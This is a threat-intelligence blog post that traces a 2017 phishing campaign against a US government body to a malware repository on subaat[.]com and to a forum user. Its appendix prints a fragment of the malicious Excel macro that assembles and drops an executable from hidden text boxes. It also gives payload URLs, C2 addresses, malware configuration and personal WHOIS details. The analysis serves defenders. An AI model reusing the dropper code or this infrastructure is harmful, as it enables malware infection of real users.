Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository

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In mid-July, Palo Alto Networks Unit 42 identified a small targeted phishing campaign aimed at a government organization. While tracking the activities of this campaign, we identified a repository of additional malware, including a web server that was used to host the payloads used for both this attack as well as others. We'll discuss how we discovered it, as well as possible attribution towards the individual behind these attacks.

The Initial Attack

Beginning on July 16, 2017, Unit 42 observed a small wave of phishing emails targeting a USbased government organization. We observed a total of 43 emails with the following subject lines:



- Invention
- Invention Event

Within the 43 emails we observed, we found that three unique files were delivered, which consisted of two RTFs and a Microsoft Excel file. Both RTFs exploited CVE-2012-0158 and acted as downloaders to ultimately deliver the <u>QuasarRAT</u> malware family. The downloaders made use of the same shellcode, with minor variances witnessed between them. Additionally, the RTFs made use of heavy obfuscation within the documents themselves, making it more difficult to extract the embedded shellcode.

The Microsoft Excel file contained malicious macros that resulted in dropping and subsequently executing Crimson Downloader. The Excel document contained a UserForm that in turn contained three text boxes. The embedded payload was hex-encoded and split between these three text boxes. The malicious macro extracted this information from the text boxes, dropped it to a specific location, and eventually executed the Crimson Downloader payload.

Detailed information about these malware samples may be found in the <u>appendix</u> of this blog.

A curious aspect of this campaign is the use of Crimson Downloader in this email campaign. To date, we have not widely seen Crimson Downloader being used: in fact, we have only seen 123 unique instances of this malware family being used to date. Readers may recall a previous blog post from March 2016 that <u>discussed Crimson Downloader</u>. That blog post discussed relationships with both <u>Operation Transparent Tribe</u> and <u>Operation C-Major</u>, which were both targeted campaigns that made use of Crimson Downloader aimed at diplomatic and political targets. The connections we observed in this research leads us to believe there might be a connection between this most recent activity we observed and those campaigns. However, there is not enough evidence to say so decisively.

Expanding the Scope from the Original Attacks

When looking at the various malware samples encountered as we analyzed this campaign, we identified a total of three hosts/IP addresses, as shown in the following chart:

5.189.157[.]215	Crimson Downloader connects to this IP address.
115.186.136[.]237	QuasarRAT connects to this IP address.
subaat[.]com (Resolves to 23.92.211[.]186)	RTFs download QuasarRAT from this host.

Starting with the first IP address that was used by Crimson Downloader, we can see that this address appears to be located in Germany and is almost exclusively associated with this malware family. Based on our telemetry, this IP address has exclusively been used to

communicate with Crimson Downloader. We observed a total of 16 unique Crimson Downloader samples starting in May of this year.

Moving onto the second IP address of 115.186.136[.]237, we see that this IP address belongs to a Pakistan-based Internet Service Provider (ISP), based in Islamabad, that services both residential and commercial customers.

The subaat[.]com domain has historic WHOIS information from early 2016 that references a Pakistani location, as seen in the image below. Additionally, it uses pkwebhost[.]net for its DNS, which is a Pakistan-based hosting provider.

Attribute	Value
WHOIS Server	whois.godaddy.com
Registrar	GODADDY.COM, LLC
Email	smsallteam@gmail.com (registrant, admin, tech)
Name	anis kazi (registrant, admin, tech)
Organization	
Street	nasim nagar star banglows colony banglow 23 (registrant, admin, tech)
City	hyderabad (registrant, admin, tech)
State	Sindh (registrant, admin, tech)
Postal	71000 (registrant, admin, tech)
Country	PAKISTAN (registrant, admin, tech)
Phone	923313536287 (registrant, admin, tech)
NameServers	NS29.PKWEBHOST.NET NS30.PKWEBHOST.NET

Figure 1 Historical WHOIS information for subaat[.]com from early 2016

The references to Pakistan in conjunction with the use of Crimson Downloader, which has historically been associated with Pakistan actors, is certainly interesting.

The RTFs we observed in the original email campaign downloaded QuasarRAT from http://subaat[.]com/files/sp.exe. Checking this host led us to discover that directory listings were enabled. We were able to discover a large repository of malware on this open server.

 \rightarrow C (i) subaat.com/files/

Index of /files

- Parent Directory
- (1) Facebook 3.MP4
- <u>2012.doc</u>

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- <u>2015.doc</u>
- <u>2016.doc</u>
- <u>2016hta.hta</u>
- <u>2017.doc</u>
- <u>714.exe</u>
- <u>Action Screen Recorder.rar</u>
- <u>App.APK</u>
- <u>Application.apk</u>
- <u>Backdoor.exe</u>
- <u>Client.exe</u>
- <u>CodeluxCrypterV2.6.1.rar</u>
- <u>Cry.EXE</u>
- <u>DarkComet v5.3 special edition.rar</u>
- DarkShadeRat.exe
- Detail.xls
- EhsanCV.pdf
- <u>FOREX.rar</u>
- File.exe
- IDM Universal Crack.rar
- IDM Universal Web Crack.rar
- Install.APK
- Irn.php
- Lost®Door E-Lite v9.1.zip
- <u>Luminosity.zip</u>
- <u>NS.exe</u>
- <u>NinjaBlasterSetup.zip</u>
- PureRAT v10.4b.rar
- Raja4HTA.hta
- <u>Ramcos17.rar</u>
- <u>Saddam crypter.exe</u>
- <u>Saddam crypter.rar</u>
- <u>Setup File.exe</u>
- <u>Setup File.zip</u>
- <u>Setup Fille.exe</u>
- <u>Setup file.exe</u>
- <u>Setup.exe</u>
- <u>Universal Crack.rar</u>

Figure 2 Open directory listing of subaat[.]com

Since beginning this research, this domain has been suspended by the hosting provider. However, it returned in mid-August, hosting both a malicious APK and a known instance of QuasarRAT.

Home			Drag Files Here To Upload or Choose Files No file choose	Create New Folder create
Name	Size	Modified	Permissions	Actions
Dwn		Aug 17, 2017 11:40 AM	read+write+exec	
error_log	141 bytes	Aug 18, 2017 10:28 AM	read+write	od download
.htaccess	82 bytes	Mar 3, 2017 6:15 AM	read+write	od download
ns4aug.exe	842.5 KB	Aug 18, 2017 4:35 AM	read+write	ownload
.well-known		Jul 13, 2017 11:04 PM	read+write+exec	

Figure 3 Subaat returns after suspension

In total, we found 84 unique malware payloads hosted on this server, in addition to a number of miscellaneous scripts. The chart below shows the malware families we identified:



Figure 4 Malware families identified in web server repository

As we can see from the above chart, a wealth of different malware families were stored on this web server. Many of these malware families are considered to be commodity malware, or widely used by criminals. Palo Alto Networks has reported on many of these families in the past, including <u>LuminosityLink</u>, <u>QuasarRAT</u>, and <u>DarkComet</u> to name a few. The large number of commodity malware families paints a very different picture from the original attack that made use of Crimson Downloader, which is not a widely used malware. A full list of SHA256 hashes associated with these samples may be found in the <u>appendix</u>.

One thing that caught our eye was the large number of LuminosityLink malware samples stored on this server. Looking at the embedded configuration settings for these samples, we see that they are all similar. The following example shows one of these configurations. A script written in a previous blog post was used to generate the output below, it can be downloaded <u>here</u>.

SHA256:	a0d53f159c8df34d2756448f2c038cf7c07db9def7425db7e30ed3d7356d6301		
Embedded Email:	khurram.rizvi@hotmail.com		
Encryption Key:	<pre>\ecnOnuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS</pre>		
Domain/IP:	hassanusauae786.hopto.org		
Port:	21		
Backup DNS:	192.168.0.102		
Filename:	pdf.exe		
Startup Name:	Client Monitor		
Folder Name:	Client		
Data Directory Name:	Monitor		
Backup Startup Exe:	clientmonitor.exe		
Mutex:	36c94f47f4935404b39c5a091924682eeea9ab9a		
Build ID:	50		
Settings:			
[X] Enable Client I	nstallation/Startup		
[X] Client Persister	nce Module: Protect Luminosity's Client Binary		
[X] Silent Mode (Hi	de Luminosity Window on Client PC)		
[X] Proactive Anti-	[X] Proactive Anti-Malware: Clean Malicious Files and Speed up Client PC		
[X] Power Saver: Pro	[X] Power Saver: Prevent Sleep Mode and Turn off Monitor after 15 minutes of inactivity		
[X] Remove File aft	[X] Remove File after Execution (Melt)		
[] Anti-Virtual Ma	chines/Debugging		
[X] Hide File and D	irectories		
[X] Backup Startup			

Figure 5 Embedded configuration within LuminosityLink sample

The email address shown above is used to register a customer's copy of LuminosityLink. All samples using this registered builder contain this email address. We found all 20 of the identified LuminosityLink samples contained this same email address. The primary domain shown above is registered to 115.186.136[.]237, which is the IP address used by QuasarRAT for Command and Control (C2) communications. Looking at other samples found within the web server repository, we identified a number of malware families communicating with this IP address, including the following:

- QuasarRAT
- LuminosityLink
- Meterpreter
- NJRAT
- RevengeRAT
- RemcosRAT

We also discovered that the email address discussed above was being used by an account on the popular HackingForum web forum service. The account in question that claims to own this email address is none other than 'Subaat'.



Figure 6 Subaat user mentioning the hotmail email address on HackForums

Looking at this user's profile below, we can see their posting history: a total of 14 posts in the past two years. We also see a date of birth of 2/24/1990, stating that the individual is 27 years old.

Subaat Peasant Registration Date: 07-07-2015 Date of Birth: 02-24-1990 (27 Local Time: 08-17-2017 at 08:0 Status: Offline Username Changes: 0	; years old))7 AM
Subaat's Forum Info	
Joined:	07-07-2015
Last Visit:	08-14-2017 11:27 AM
Total Posts:	14 (0.02 posts per day 0 percent of total posts) (Find All Threads — Find All Posts — Post Activity)
Time Spent Online:	19 Hours, 57 Minutes, 22 Seconds
Reputation:	0 [Details] [Given] [Trust Scan]
Prestige:	0
Reported Posts:	0
Awards:	0 [Details]
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Figure 7 Subaat profile information

A quick look at the posting history indicates that this person was inactive starting around December 2016, but returned to posting in early July of this year. This is in line with the campaign witnessed against a US-based government organization that took place on July 16th. The posts look to be related to various Office exploit builders and crypters. This again is in line with both the campaign we witnessed as well as the various malware we identified on subaat[.]com.



Figure 8 Subaat posting history

A Look Behind the Scenes

Looking at logs for the subaat webserver between July 1st and July 20th shows the IP address of 115.186.136[.]237 uploading and interacting with a number of malicious files. We found interactions with a total of 64 unique files during this period. Below is a chart showing the attacker at this IP address interacting with some of the more popular malware families that have been identified.



Figure 9 Interaction between attacker and web server

As we can see from the chart above, a spike of activity took place in the July 11th to July 16th timeframe. This again is consistent with the email campaign that took place in the midst of this period. A number of malware families have been used by this specific attacker, and many of them are configured to communicate with 115.186.136[.]237 as the C2.

Conclusion

What started out as a simple look into what appeared to be a targeted phishing campaign turned into much more. By the end of this research endeavor, we have identified a server hosting a large number of malware samples that has been primarily used by one specific IP address. This IP address not only interacted with this web server, but also acted as a C2 server for many of these malware families. While looking at malware associated with this actor, we discovered an email address that is tied to a user account on HackForums that has a name consistent with the domain used to host the actor's malware.

We saw similarities this campaign and both the Operation Transparent Tribe and Operation C-Major campaigns. Additionally, there is marginal evidence that suggests that the attacker may be based in Pakistan, which is again in line Operation Transparent Tribe. However, the overall evidence is not conclusive, and there is insufficient proof to say decisively that this is the same threat actor.

Palo Alto Networks customers are protected by this threat in a number of ways:

- All identified samples are flagged as malicious within the Palo Alto Networks platform
- All domains identified within this research have been appropriately marked as malicious
- Traps correctly identified and blocks the exploits using CVE-2012-0158 and CVE-2017-0199

Appendix

Analysis of Malicious RTF Documents

The two identified samples that were used in a campaign against a US-based government organization has the following SHA256 hashes:

0ade053b355eca7ae1fccea01fe14ff8d56a9d1703d01b3c00f7a09419357301 9a57f96a3fd92b049494807b6f99ffcd6bb9eb81f4f5b352d4b525ad32fac42d

These samples varied in size greatly, however, the underlying shellcode was consistent. One notable difference observed in one of the samples (OadeO5...) was the inclusion of injecting the shellcode into a newly spawned instance of svchost.exe.

When the shellcode begins, it will start by loading a number of functions that are used to inject code into svchost.exe. The following Python code demonstrates how this hashing function operates:



Figure 10 Python code demonstrating API hashing technique #1

The shellcode continues to decrypt a blob of data using a 4-byte XOR key of 0x8F51F053. This blob contains a series of important strings, such as the URL and filename, as well as functions that will be used to download the payload.

After this blob is decrypted, flow control proceeds to this blob's code, where the shellcode will load multiple libraries and functions using a specific hashing algorithm.

The shellcode continues download a file to the %TEMP% directory from the following URL:

http://subaat[.]com/files/sp.exe

The shellcode proceeds to execute this newly downloaded file prior to exiting.

Analysis of Malicious Excel Documents

The identified sample that was used in a campaign against a US-based government organization has the following SHA256 hash:

When this sample is initially executed, it will attempt to run a malicious macro that is embedded within the file. This macro begins by determining where a dropped file will reside. It will attempt to find the following folders residing within a user's profile path:

- /Documents
- /Downloads
- /AppData



Figure 11 Macro determining file path

The payload itself is stored within text boxes in a user form within the Excel document. This data is extracted and hex-decoded. The three blobs of data are concatenated to form a proper PE32 executable.

```
Sub userMRALoadr()
```

```
Dim row As Long
Dim path_file As String
Dim path_dom As String
path_file = getMRAFileName() & ".scr"
Dim ar() As String
If Len(Dir(path_file)) = 0 Then
    Open path_file For Binary As #1
    ar1 = Split(UserForm1.TextBox1.Text, ",")
    Seek #1, LOF(1) + 1
    For row = LBound(ar1) To UBound(ar1)
        Put #1, , CByte(ar1(row))
    ar1 = Null
    ar2 = Split(UserForm1.TextBox2.Text, ",")
    For row = LBound(ar2) To UBound(ar2)
       Put #1, , CByte(ar2(row))
    ar2 = Null
    ar3 = Split(UserForm1.TextBox3.Text, ",")
    For row = LBound(ar3) To UBound(ar3)
       Put #1, , CByte(ar3(row))
    ar3 = Null
```

Figure 12 Macro loading data from text boxes

A quick look at the included user form gives us a better view as to how this data is stored.

🗉 e3243674aa3661319903a8c0e1edde211f1ffdeed53b305359d3390808007621.xls 💼 🔳 📧
UserForm1 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 185, 166,0,255, 255, 255, 255, 255, 255, 255, 25
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Figure 13 Embedded user form with three text boxes

The following example Python code demonstrates the hex-decoded data shown in the highlighted text box above.

>>> import hexdump
>>> v1 = "77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
86,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,1
09, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32,
109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,0,80,69,0,0,76,1,3,0,159,139,102,89,
0,0,0,0".split(",")
<pre>>>> hexdump.hexdump(''.join(chr(int(x)) for x in v1))</pre>
00000000: 4D 5A 90 00 03 00 00 00 04 00 00 07 FF F 00 00 MZ
00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 0
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 0
00000040: 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
00000050: 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
00000060: 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
00000070: 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode\$
00000080: 50 45 00 00 4C 01 03 00 9F 8B 66 59 00 00 00 00 PELfY
00000991: 00

Figure 14 Python code hex-decoding the stored data

After this data is properly handled, the macro will drop this file with an extension of .scr to the designated file path. It is then executed in a new process. This newly spawned process is an instance of the Crimson Downloader malware family.

SHA256 Hashes

c4c478c5486a09ac06e657ace2c1edb00cc690a2ff3558598e07687aa149df71 6b6ff0bef244732e90e7a8c200bcd1d8db6f58fe4da68889eb847eb1b6458742 07cb90288ae53643a4da291863df6c9be92bfd56b953073e30b7c28c777274fc 66ef8f3660902cba0ca9bebd701d322aff1d5a13de0cf63cf3f1b8841e08efc6 20c949ca25fed25918e524dde67ffe44efb1c974a5ed68d519b77354303c4916 007e4b308a69d6c3dba5a01f754a63231b996f1a68ff43ec9b5906f583f0fc6b f7d2f547d5ab07abf59f97fb069288d682a20bc9614642777d11c7db76b36f39 20e368b0d0288b968fed7193c965a7c7ecf3e731eb93a4cbd4420242fad7ce8c 9ddc4ba7a8025598b6a8344c5537af3e2ae6e6db8356dcbfc9ad86b84dee87af 95c00b3de53c0b5742c182f9221a3086bf046ad8da57c915e8c0b6dc5180fd7f 0804202f46dc94768820cb0915b8d2b36602575ac78e526ea7f518e584069242 914b6f21297ebb81621b6da00edcda59b4c1fdd06329ed7a587c9a9b09915583 2a73231d0480f7481737256a8dca6b2549db982cc10f1761c2a267eb85dcaca4 67d4ab365f1630e750aee300f14fbfc940ea235647014030bd56c4127933834b 41efb2f1cb81160539058d8fc2ca8c037692803dcb8b332c660233bffe5bf874 e51b8bf7cc72b47c8ee59056fabd2af1795152d8df33967949d2d2a0996cc51b 4c6f7aafc2e4d8b0b7e7f21cbb102e02dc314eeb2f8e754f59ea471f58cabda0 3a664210955a82d961480adcc914456931325268ccf26c09d0275ca1d2ff35f1 5cc14c2bc185121391a7c43e3e65ced4697274e93fe42f28f20c067dde7e9f1d f19480d36453da029247fbd066c7f0c1b28912bbefafd052b1d4ee9a64eb9e31 6bbb87f05d9d987a3df3bb585de3f2fad5d5cd3f11a0e3c4587255c55a9fe2a5 75da69e466183b0d004719d32f779cd5b7849a6dac0b6303e11db543c0ddec32

a0a2edcd19a581aeba3de5bbca21065425fbf34fd1a798269ff99bd8af8bf847 2c34565535a0f90b469f0e100d9027190d3cd812bd824aa6af73b4884690a395 50c4f3d3335daf84d507ed2663a411d2ce39e9def172ddbaf7ade0f2ce0f2736 a8445387cb7e4bc79da34d371eedf50f265e145ce8f48c64aeff2690ed7f8b10 7218bc4e9b8817eff678422a9125a852c3f66ecf275aa691433dd8cd4910f66d 106938bff25de67513acc809c4c77b2aa9e9974ec8bf4d20bad154015abc77be 85116c4f9695bf15fe3fdcb20cff8634971e39c2b97b1a159446fa6cdf05e913 253bb91003a8c295a70240206605542147d7b9fdc2d26ac999772b3b78db3a80 2d5abd4cc322d5802617d6a1cd3fc22403052e2711bf6bd76976ab7d1cea45cf eod6e8584f2d3d6d807ad2fe9d2fccc792635e8e3ab0132f3b5dedc0394019c9 625f30d4abd89b94c1f732463202c51cd9424a1bcbf2e72a9779773c0f82f93c 6807c25ead1c377c975c84a214da8a68482623658369a02ce56b531d6f38a5b6 dfb984ea975ca992e1a0f9a6d30a41057edd36b170704b7831f609f44f80ad8d ed9fb1d8c36fb6oc808006ae63908980a259cb73ed44adf19856ea6c239d1eab 1f286fff72a562cd327985a1b57316364710f2cbfeedc46d12dc8d21b4611ecb 4da2fd94b4f21a346ebfa5d8793dd60a1d4200dfe6b91517a70aed4c0b59a4d4 983bc61d569839558e2a2ef2a53174efe45be4e65da991268ce1926beb4e3505 7b1ab4513788ef4b6628911ba6ed6362eb357b66d18f6988fb4ceffb20ee1d91 8c93d054d4ef93f695da9693f6de538e269b39320c934428f27cc22ef6b2d89e cd873eaded83861c4f59bfb5c902b43bfd7f5ecb13eccc385498ad9564085e97 e63f0ab5413b0013d79c57f8132c21c0c9397c88caa01edbb4fbe6c2db4932a0 24bc5f9aa78d91d6c8641b90cac6d3c3e7ddf4b30a992a9129d73c5edb04f8of 89ac4eeaecd38fcb2eb8eobacd156b6133a6093f44622f7d82e22493a69cafb7 07abc1eb421baffe4f894406c1435b3daf8d1dcfba53d8e4e8f584cf72d08110 2941360679ea485798e324e3538c358cf6cba65959ebf28df9fd4a5492bf2888

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